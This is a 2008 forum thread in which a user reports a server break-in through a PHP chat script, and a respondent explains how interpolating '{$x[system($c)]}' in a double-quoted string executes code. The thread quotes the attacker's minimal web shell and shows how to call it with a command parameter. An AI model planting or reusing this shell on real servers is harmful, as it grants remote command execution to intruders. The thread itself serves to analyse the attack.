|
|
Posted by Tim Martin on 11/30/08 11:57
Tim Martin wrote:
> Oski wrote:
>
>> our server got hacked through a security hole in an open source php
>> chat script.
>> (nothing new so far, ok!)
>>
>> This chat script allowed the user to create a new php script on our
>> server, with the following content: (the code between the two "..."
>> from the hacker):
>>
>> <?
>> $name = "{$x[system($c)]}";
>> // some more lines ommitted ...
>> ?>
>>
>> save these lines as e.g. /sys.php and call it with your browser:
>> http://localhost/sys.php?c=ls
>> and you can execute any system command and see the results!
>>
>> But: How does it work? The content of a variable being executed and
>> written to the browser?
>> If it were just "system($c)" then I understood.
>
> If you write
> $a = "{$x['key']}";
>
> then $a gets the value $x['key'] as expected.
>
> $a = $x[system($c)];
>
> then $a gets the element of the array $x corresponding to the return
> value of system($c) (and as a side-effect, system($c) has been called).
>
> It seems like combining these two features allows you to execute code
> within a double-quoted string, merely by referencing the string literal.
>
> I'm not sure if this is an intentional feature or not, hence whether
> it's a security hole or not. At the very least I think it deserves more
> emphasis in the manual page about quoted strings. Nothing I can see in
> the manual page mentions that arbitrary code could be executed.
Following up to myself, I should note that this is not as big an issue
as it seems on the surface - it only matters if the malicious user
writes the string literal itself. If they control a variable that is
substituted into the string literal, it isn't a problem. e.g.
$intermediate = "system($c)"; // Set by malicious user from a form input
// or some other non-string-literal
$a = "{$x[$intermediate]}"; // This code written by you, not under the
// control of the malicious user
is fine.
Tim
Navigation:
[Reply to this message]
|